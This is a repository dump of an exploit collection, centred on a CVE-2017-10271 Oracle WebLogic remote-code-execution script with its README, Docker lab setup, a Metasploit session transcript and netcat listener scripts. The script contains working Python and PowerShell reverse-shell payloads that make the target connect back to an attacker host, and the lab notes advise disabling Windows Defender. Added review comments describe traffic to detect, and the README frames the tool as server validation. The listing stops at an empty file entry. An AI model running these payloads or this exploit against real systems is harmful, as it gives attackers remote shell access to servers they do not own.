├── .gitignore ├── CVE-2017-10271 ├── CVE-2017-10271.py ├── LICENSE ├── README.md ├── docker │ ├── Dockerfile │ └── README.md ├── listeners │ ├── nc-exploit-listener.sh │ ├── py2-check-listener.sh │ └── py3-check-listener.sh ├── msf-linux-runner.rc ├── oracle_weblog_wsat_rce.rb ├── original-poc │ └── original-poc.py ├── scanners │ ├── LICENSE │ ├── Makefile │ ├── README.md │ ├── bin │ │ ├── CVE-2017-10271.release.1.5.1.amd64.darwin │ │ ├── CVE-2017-10271.release.1.5.1.amd64.dragonfly │ │ ├── CVE-2017-10271.release.1.5.1.amd64.freebsd │ │ ├── CVE-2017-10271.release.1.5.1.amd64.linux │ │ ├── CVE-2017-10271.release.1.5.1.amd64.netbsd │ │ ├── CVE-2017-10271.release.1.5.1.amd64.openbsd │ │ ├── CVE-2017-10271.release.1.5.1.amd64.solaris │ │ └── CVE-2017-10271.release.1.5.1.amd64.windows.exe │ ├── cmd │ │ ├── root.go │ │ └── version.go │ ├── libcve201710271 │ │ ├── banner.go │ │ ├── config.go │ │ ├── payload.go │ │ ├── request.go │ │ ├── target.go │ │ ├── urls.go │ │ └── workers.go │ └── main.go └── vulnerable_machine_setup.md ├── CVE-2017-11882 ├── CVE-2017-11882.py ├── README.md └── a.doc ├── README.md ├── StrutsPOCV2.0.jar ├── cve-2016-6662 ├── cve-2016-6662_MySQL_RCE_exploit.py └── mysql_hookandroot_lib.c ├── dedecms ├── found_admin_login_page.php └── found_admin_login_page.py ├── iis6_exploit.py ├── imageMagic ├── command.jpg ├── command2.jpg ├── command3.jpg └── ssrf.jpg ├── jenkins └── CVE-2018-1999002.py ├── phpcms └── phpcmsv9.6.0_sqli.py ├── struts2 ├── .DS_Store ├── readme.txt ├── s2-045 │ ├── st2-045.py │ └── tmp.txt ├── s2-046 │ └── s2-046.sh └── struts2-exp.py ├── webdav_exec_CVE-2017-11882.py ├── weblogicANDjbossTool ├── DeserializeExploit.jar ├── JBOSS_EXP.jar ├── WebLogicExploit.jar └── WebLogic_EXP.jar └── zabbixPwn.py /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /CVE-2017-10271/CVE-2017-10271.py: 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Weblogic wls-wsat Component Deserialization RCE
# Date Authored: Jan 3, 2018
# Date Announced: 10/19/2017
# Exploit Author: Kevin Kirsche (d3c3pt10n)
# Exploit Github: https://github.com/kkirsche/CVE-2017-10271
# Exploit is based off of POC by Luffin from Github
# https://github.com/Luffin/CVE-2017-10271
# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0
# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS
# CVE: CVE-2017-10271
# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/
# (Python 3) Example check listener: python3 -m http.server 4444
# (Python 2) Example check listener: python -m SimpleHTTPServer 4444
# (Netcat) Example exploit listener: nc -nlvp 4444
#
# Reviewer notes (defensive reading of this file):
# * The only network traffic this script generates is a single HTTP POST to
#   <rhost>/wls-wsat/CoordinatorPortType with Content-Type text/xml;charset=UTF-8
#   and a hard-coded desktop Chrome User-Agent (see Exploit.post_exploit). A
#   text/xml POST to a wls-wsat endpoint from a browser-looking client is the
#   pattern to alert on; the README lists the sibling wls-wsat paths that
#   should be covered by the same rule.
# * In check mode (-c) the server-side observable is an outbound HTTP GET from
#   the WebLogic host to <lhost>:<lport>/<16 random characters>; an application
#   server initiating that kind of egress is itself a strong indicator.
# * Oracle's fix (quoted in the README) validates the XML before it is
#   deserialised and rejects the element names object, new and method. The
#   payload templates in this copy of the file have had their XML tags stripped,
#   so the exact elements used here cannot be read from this page.
# * The file targets Python 2 (shebang "python", SimpleHTTPServer listener) and
#   is syntactically valid on Python 3 as well.

from sys import exit  # NOTE(review): imported but never used in this file
from requests import post  # third-party; the single network call, in Exploit.post_exploit
from argparse import ArgumentParser
from random import choice  # non-cryptographic; only used for the check-mode URI suffix
from string import ascii_uppercase, ascii_lowercase, digits
from xml.sax.saxutils import escape  # XML-escapes &, <, > in the command string

class Exploit:
    """Build and send one CVE-2017-10271 request to a WebLogic WS-AT endpoint.

    Two modes are selected by ``check``:

    * check mode posts ``get_generic_check_payload()``; per the CLI help this
      makes the target issue an HTTP request to ``http://lhost:lport/<random>``,
      and a hit on the listener is the vulnerability signal;
    * execute mode posts ``get_process_builder_payload()``, which carries
      ``cmd_payload`` (a reverse shell to ``lhost:lport``) to be run via
      ``cmd /c`` or ``/bin/sh -c`` depending on ``windows``.

    The HTTP response is never inspected (see ``post_exploit``), so the only
    feedback in either mode is what arrives at the listener.
    """

    def __init__(self, check, rhost, lhost, lport, windows):
        """Store the target/listener parameters and pre-build the shell command.

        Args:
            check: True to send only the HTTP-callback check, False to execute.
            rhost: base URL of the WebLogic server (e.g. ``http://host:7001/``).
                Trailing slashes are removed because the endpoint path appended
                in ``post_exploit`` starts with one.
            lhost: host the target should connect back to.
            lport: port the target should connect back to. The CLI passes a
                string; the Windows branch concatenates it with ``+``, so an
                int here would raise TypeError.
            windows: True selects the PowerShell payload, False the python one.
        """
        # NOTE(review): strip('/') also removes *leading* slashes; harmless for an
        # absolute URL, but rstrip('/') expresses the intent.
        self.url = rhost if not rhost.endswith('/') else rhost.strip('/')
        self.lhost = lhost
        self.lport = lport
        self.check = check
        if windows:
            self.target = 'win'
        else:
            self.target = 'unix'

        if self.target == 'unix':
            # Unix reverse shell
            # You should also be able to instead use something from MSFVenom. E.g.
            # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444
            # lhost/lport are substituted with str.format.
            self.cmd_payload = (
                "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket."
                "SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2("
                "s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
            ).format(lhost=self.lhost, lport=self.lport)
        else:
            # Windows reverse shell
            # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444
            # NOTE(review): here lhost/lport are spliced in with '+' rather than
            # format(); the surrounding r"..." pieces rely on implicit
            # adjacent-literal concatenation, which binds tighter than '+'.
            self.cmd_payload = (
                r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) "
                r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +""
                r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a"
                r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
                r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
                r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"
                r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
                r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"
                r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
                r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;"
                r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)"
                r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;"
                r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};"
                r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if "
                r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne"
                r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e."
                r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};"
            )
        # XML-escape the command (&, <, >) so it can be interpolated verbatim
        # into the text/xml body by get_process_builder_payload(). The check
        # payload never uses cmd_payload, but it is built in both modes.
        self.cmd_payload = escape(self.cmd_payload)

    def cmd_base(self):
        """Return the interpreter for the execute payload: 'cmd' on win, else '/bin/sh'."""
        if self.target == 'win':
            return 'cmd'
        return '/bin/sh'

    def cmd_opt(self):
        """Return the "run this string" switch matching cmd_base(): '/c' or '-c'."""
        if self.target == 'win':
            return '/c'
        return '-c'


    def get_generic_check_payload(self):
        """Return the text/xml body used in check mode.

        The callback URL interpolated into the template is
        ``http://{lhost}:{lport}/{random_uri}`` with a 16-character
        [A-Za-z0-9] suffix drawn with random.choice -- not cryptographically
        random, and presumably only there so a listener hit can be matched to
        this run.

        NOTE(review): in this copy of the file the XML element tags of the
        template have been stripped (only the URL line survived), so the SOAP
        envelope that wraps it cannot be read from here.
        """
        random_uri = ''.join(
            choice(ascii_uppercase + ascii_lowercase + digits)
            for _ in range(16))
        generic_check_payload = '''




http://{lhost}:{lport}/{random_uri}









'''

        return generic_check_payload.format(
            lhost=self.lhost, lport=self.lport, random_uri=random_uri)

    def get_process_builder_payload(self):
        """Return the text/xml body used in execute mode.

        Three values are interpolated, in this order: ``cmd_base()``,
        ``cmd_opt()`` and the already XML-escaped ``self.cmd_payload``; this is
        the only place the pre-built shell command leaves the object.

        NOTE(review): as with the check template, the XML element tags are
        missing from this copy of the file; only the three placeholders remain.
        """
        process_builder_payload = '''






{cmd_base}


{cmd_opt}


{cmd_payload}









'''
        return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),
                                              cmd_payload=self.cmd_payload)

    def print_banner(self):
        """Print the tool name, the target base URL and the listener host:port."""
        print("=" * 80)
        print("CVE-2017-10271 RCE Exploit")
        print("written by: Kevin Kirsche (d3c3pt10n)")
        print("Remote Target: {rhost}".format(rhost=self.url))
        print("Shell Listener: {lhost}:{lport}".format(
            lhost=self.lhost, lport=self.lport))
        print("=" * 80)

    def post_exploit(self, data):
        """POST ``data`` to ``<url>/wls-wsat/CoordinatorPortType`` and prompt the user.

        Args:
            data: the full text/xml body from one of the get_*_payload methods.

        The request uses Content-Type text/xml;charset=UTF-8, a fixed desktop
        Chrome User-Agent, a 10 s timeout and ``verify=False`` -- TLS
        certificate validation is disabled for https targets. The response is
        never examined: ``req`` is assigned and dropped, and the
        "Did you get ..." prompt is printed for any HTTP status, so only the
        listener tells you whether anything happened. Any exception raised by
        requests is caught and printed as a connection error rather than
        propagated. Only this one endpoint is tried; the README lists the
        other wls-wsat paths served by the same component.
        """
        headers = {
            "Content-Type":
            "text/xml;charset=UTF-8",
            "User-Agent":
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
        }
        # Endpoint path, appended to the slash-stripped base URL from __init__.
        payload = "/wls-wsat/CoordinatorPortType"

        vulnurl = self.url + payload
        try:
            req = post(
                vulnurl, data=data, headers=headers, timeout=10, verify=False)
            if self.check:
                print("[*] Did you get an HTTP GET request back?")
            else:
                print("[*] Did you get a shell back?")
        except Exception as e:
            print('[!] Connection Error')
            print(e)

    def run(self):
        """Print the banner, build the payload for the selected mode, echo it and send it.

        The generated XML body is printed in full before the request is made,
        which is useful when capturing a sample for a detection rule.
        """
        self.print_banner()
        if self.check:
            print('[+] Generating generic check payload')
            payload = self.get_generic_check_payload()
        else:
            print('[+] Generating execution payload')
            payload = self.get_process_builder_payload()
        print('[*] Generated:')
        print(payload)
        if self.check:
            print('[+] Running generic check payload')
        else:
            print('[+] Running {target} execute payload'.format(target=self.target))

        self.post_exploit(data=payload)


if __name__ == "__main__":
    # CLI entry point. The three host/port options are stored as plain strings
    # (no type=), and nargs='?' means a bare "-l"/"-p"/"-r" with no value is
    # accepted and stored as None, which would later be formatted into the
    # payload as the text "None" rather than rejected.
    parser = ArgumentParser(
        description=
        'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'
    )
    parser.add_argument(
        '-l',
        '--lhost',
        required=True,
        dest='lhost',
        nargs='?',
        help='The listening host that the remote server should connect back to')
    parser.add_argument(
        '-p',
        '--lport',
        required=True,
        dest='lport',
        nargs='?',
        help='The listening port that the remote server should connect back to')
    parser.add_argument(
        '-r',
        '--rhost',
        required=True,
        dest='rhost',
        nargs='?',
        help='The remote host base URL that we should send the exploit to')
    parser.add_argument(
        '-c',
        '--check',
        dest='check',
        action='store_true',
        help=
        'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'
    )
    parser.add_argument(
        '-w',
        '--win',
        dest='windows',
        action='store_true',
        help=
        'Use the windows cmd payload instead of unix payload (execute mode only).'
223 | ) 224 | 225 | args = parser.parse_args() 226 | 227 | exploit = Exploit( 228 | check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport, 229 | windows=args.windows) 230 | exploit.run() 231 | -------------------------------------------------------------------------------- /CVE-2017-10271/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 
34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /CVE-2017-10271/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-10271 2 | 3 | Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script 4 | 5 | ### Usage 6 | 7 | ```bash 8 | $ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/ 9 | ``` 10 | 11 | ### Features 12 | 13 | * Standalone Python script 14 | * Check functionality to see if any host is vulnerable 15 | * Exploit functionality for Linux targets 16 | * Metasploit module 17 | * Check functionality to see if any host is vulnerable 18 | * Exploit functionality for all targets 19 | * Scanner (./scanners) 20 | * Checks to see if a host is vulnerable. Fully self-contained 21 | 22 | ## Legal Notices 23 | 24 | You are responsible for the use of this script. Kevin Kirsche takes no responsibility for any actions taken using the code here. The code was created for teams looking to validate the security of their servers, not for malicious use. 
25 | 26 | ## Thanks 27 | 28 | Big thanks to Luffin for creating the original POC that this was based on: https://github.com/Luffin/CVE-2017-10271 29 | 30 | ## Vulnerable URLs other than the one shown: 31 | 32 | ``` 33 | /wls-wsat/CoordinatorPortType 34 | /wls-wsat/CoordinatorPortType11 35 | /wls-wsat/ParticipantPortType 36 | /wls-wsat/ParticipantPortType11 37 | /wls-wsat/RegistrationPortTypeRPC 38 | /wls-wsat/RegistrationPortTypeRPC11 39 | /wls-wsat/RegistrationRequesterPortType 40 | /wls-wsat/RegistrationRequesterPortType11 41 | ``` 42 | 43 | ## Related Vulnerability 44 | CVE-2017-3506 45 | 46 | ## Oracle's Patch 47 | 48 | Source: 49 | https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/ 50 | The patched `validate()` runs a SAX pass over the request body before it is deserialised: it rejects any `object`, `new` or `method` element outright, and allows only the `index` attribute on `void`. 51 | ```java 52 | private void validate(InputStream is) { 53 | WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory(); 54 | 55 | try { 56 | SAXParser parser = factory.newSAXParser(); 57 | 58 | parser.parse(is, new DefaultHandler()) { 59 | private int overallarraylength = 0; 60 | 61 | public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception { 62 | if (qName.equalsIgnoreCase("object")) { 63 | throw new IllegalStateException("Invalid element qName:object"); 64 | } else if (qName.equalsIgnoreCase("new")) { 65 | throw new IllegalStateException("Invalid element qName:new"); 66 | } else if (qName.equalsIgnoreCase("method")) { 67 | throw new IllegalStateException("Invalid element qName:method"); 68 | } else { 69 | if (qName.equalsIgnoreCase("void")) { 70 | for(int attClass = 0;attClass < attributes.getLength(); ++attClass) { 71 | if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) { 72 | throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass)); 73 | } 74 | } 75 | } 76 | 77 | ... more code here ... 
78 | } 79 | } 80 | } 81 | } 82 | } 83 | ``` 84 | -------------------------------------------------------------------------------- /CVE-2017-10271/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zhiqzhao/ubuntu_weblogic1036_domain 2 | RUN apt-get update && apt-get -y install python 3 | -------------------------------------------------------------------------------- /CVE-2017-10271/docker/README.md: -------------------------------------------------------------------------------- 1 | # Vulnerable Application 2 | 3 | Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution. 4 | 5 | ### Windows: Setting up a vulnerable application 6 | 7 | We successfully tested this exploit against a fully-patched, Windows 10 (x64) target. Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM. 8 | 9 | 1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`). 10 | 2. Run the installer. (See [here] for detailed instructions.) You may be prompted to install a Java Development Kit (JDK). [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working. 11 | 3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it. 12 | 4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192). Domain names and credentials are irrelevant. 
At the conclusion of the wizard, click "Start Admin Server". 13 | 5. The `startWebLogic.cmd` should run immediately after the installer and present logging output. Once running, the window should output a line similar to the following 14 | ``` 15 | 16 | 17 | ``` 18 | 19 | ### Windows: Attacking a vulnerable application 20 | 21 | Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`: 22 | 23 | ``` 24 | msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce 25 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target] 26 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0 27 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell 28 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker] 29 | msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run 30 | 31 | [*] Started reverse TCP handler on 192.168.108.1:4444 32 | [*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600 33 | 34 | Microsoft Windows [Version 10.0.16299.192] 35 | (c) 2017 Microsoft Corporation. All rights reserved. 36 | 37 | C:\Oracle\Middleware\user_projects\domains\admindomain>whoami 38 | weblogic-server\Administrator 39 | ``` 40 | 41 | ### Unix: Setting up a vulnerable environment 42 | 43 | 1. If necessary, install Docker.io. 
[These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM: 44 | 45 | ``` 46 | apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D 47 | echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list 48 | apt update 49 | apt-get install docker-engine 50 | service docker start 51 | docker run hello-world 52 | ``` 53 | 54 | 2. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0: 55 | ``` 56 | docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271 57 | ``` 58 | 59 | 3. Confirm that the container is up. 60 | ``` 61 | docker ps 62 | ``` 63 | -------------------------------------------------------------------------------- /CVE-2017-10271/listeners/nc-exploit-listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "[+] Starting listener on port 4444" 4 | nc -nlvp 4444 5 | -------------------------------------------------------------------------------- /CVE-2017-10271/listeners/py2-check-listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "[+] Installing requests dependency" 4 | pip install -U requests 5 | 6 | echo "[+] Starting listener on port 4444" 7 | python -m SimpleHTTPServer 4444 8 | -------------------------------------------------------------------------------- /CVE-2017-10271/listeners/py3-check-listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "[+] Installing requests dependency" 4 | pip3 install -U requests 5 | 6 | echo "[+] Starting listener on port 4444" 7 | python3 -m http.server 4444 8 | -------------------------------------------------------------------------------- /CVE-2017-10271/msf-linux-runner.rc: 
